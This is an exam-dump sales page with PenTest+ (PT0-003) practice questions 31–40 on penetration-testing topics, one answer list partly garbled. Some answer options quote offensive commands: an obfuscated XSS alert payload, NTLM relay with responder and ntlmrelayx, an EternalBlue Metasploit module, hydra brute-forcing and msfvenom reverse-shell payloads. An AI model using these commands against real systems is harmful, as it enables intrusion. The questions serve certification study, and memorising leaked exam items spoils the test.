Pre-Summer Sale Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 65pass65

PT0-003 CompTIA PenTest+ Exam is now Stable and With Pass Result | Test Your Knowledge for Free

Exams4sure Dumps

PT0-003 Practice Questions

CompTIA PenTest+ Exam

Last Update 3 days ago
Total Questions : 330

Dive into our fully updated and stable PT0-003 practice test platform, featuring all the latest PenTest+ exam questions added this week. Our preparation tool is more than just a CompTIA study aid; it's a strategic advantage.

Our free PenTest+ practice questions crafted to reflect the domains and difficulty of the actual exam. The detailed rationales explain the 'why' behind each answer, reinforcing key concepts about PT0-003. Use this test to pinpoint which areas you need to focus your study on.

PT0-003 PDF

PT0-003 PDF (Printable)
$54.25
$154.99

PT0-003 Testing Engine

PT0-003 PDF (Printable)
$59.5
$169.99

PT0-003 PDF + Testing Engine

PT0-003 PDF (Printable)
$74.55
$212.99
Question # 31

During a discussion of a penetration test final report, the consultant shows the following payload used to attack a system:

html

Copy code

7/ < sCRitP > aLeRt( ' pwned ' ) < /ScriPt >

Based on the code, which of the following options represents the attack executed by the tester and the associated countermeasure?

Options:

A.  

Arbitrary code execution: the affected computer should be placed on a perimeter network

B.  

SQL injection attack: should be detected and prevented by a web application firewall

C.  

Cross-site request forgery: should be detected and prevented by a firewall

D.  

XSS obfuscated: should be prevented by input sanitization

Discussion 0
Question # 32

A penetration tester obtains local administrator access on a Windows system and wants to attempt lateral movement. The system exists within a Windows Workgroup environment. Which of the following actions should the tester take?

Options:

A.  

Create a malicious certificate.

B.  

Dump credentials from memory.

C.  

Craft Kerberos tickets.

D.  

List potential privilege escalation paths.

Discussion 0
Question # 33

A company hires a penetration tester to test the security of its wireless networks. The main goal is to intercept and access sensitive data.

Which of the following tools should the security professional use to best accomplish this task?

Options:

A.  

Metasploit

B.  

WiFi-Pumpkin

C.  

SET

D.  

theHarvester

E.  

WiGL

E.  

net

Discussion 0
Question # 34

A penetration tester completes an authenticated vulnerability scan of a host and receives the following results:

Line 1: 10.1.10.127 resolves to comptia.foo.local

Line 2: FOUND ports 445, 3389 TCP open

Line 3: OS Fingerprint 70% confidence Windows 7 SP0

Line 4: SMB signing is disabled

Line 5: Scan Complete.

Which of the following is most likely to cause stability issues when a session is created on a target machine?

Options:

A.  

Running Responder with default settings and using Impacket

B.  

Running Nmap with safe scripts enabled and targeting RDP

C.  

Running Metasploit utilizing the EternalBlue module

D.  

Running Hydra on the local user at one attempt per second

Discussion 0
Question # 35

A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output:

kotlin

Copy code

Nmap scan report for some_host

Host is up (0.01 latency).

PORT STATE SERVICE

445/tcp open microsoft-ds

Host script results: smb2-security-mode: Message signing disabled

Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?

Options:

A.  

responder -T eth0 -dwv ntlmrelayx.py -smb2support -tf < target >

B.  

msf > use exploit/windows/smb/ms17_010_psexec msf > < set options > msf > run

C.  

hydra -L administrator -P /path/to/passwdlist smb:// < target >

D.  

nmap —script smb-brute.nse -p 445 < target >

Discussion 0
Question # 36

A penetration tester is performing an assessment focused on attacking the authentication identity provider hosted within a cloud provider. During the reconnaissance phase, the tester finds that the system is using OpenID Connect with OAuth and has dynamic registration enabled. Which of the following attacks should the tester try first?

Options:

A.  

A password-spraying attack against the authentication system

B.  

A brute-force attack against the authentication system

C.  

A replay attack against the authentication flow in the system

D.  

A mask attack against the authentication system

Discussion 0
Question # 37

A penetration tester reviews a scan report and identifies a deserialization vulnerability. The vulnerability is due to the way a function from a Python library has been used in code. The scan does not consider input data being used in the function ' s serialization. Which of the following scan types most likely provided this finding?

Options:

A.  

DAST

B.  

SAST

C.  

IAST

D.  

SCA

Discussion 0
Question # 38

A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?

Options:

A.  

msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443

B.  

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000

C.  

msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 EXITFUNC=none

D.  

net user add /administrator | hexdump > payload

Discussion 0
Question # 39

A penetration tester wants to expand access into a network by enumerating users and credentials. The tester runs some tools for enumeration and captures the following information:

[SMB] Client: 10.203.10.14

[SMB] Username: comptiaadmin

[SMB] Hash: 10.203.20.16:a96409231c099f17

Which of the following steps should the penetration tester take next?

Options:

A.  

Use Hydra to brute-force passwords with the captured username.

B.  

Utilize the auxiliary/server/http_ntlmrelay module in Metasploit.

C.  

Perform a secretsdump with Impacket using the NTLM digest.

D.  

Load the hash information into John the Ripper for cracking.

Discussion 0
Question # 40

A penetration tester needs to confirm the version number of a client ' s web application server. Which of the following techniques should the penetration tester use?

Options:

A.  

SSL certificate inspection

B.  

URL spidering

C.  

Banner grabbing

D.  

Directory brute forcing

Discussion 0
Get PT0-003 dumps and pass your exam in 24 hours!

Free Exams Sample Questions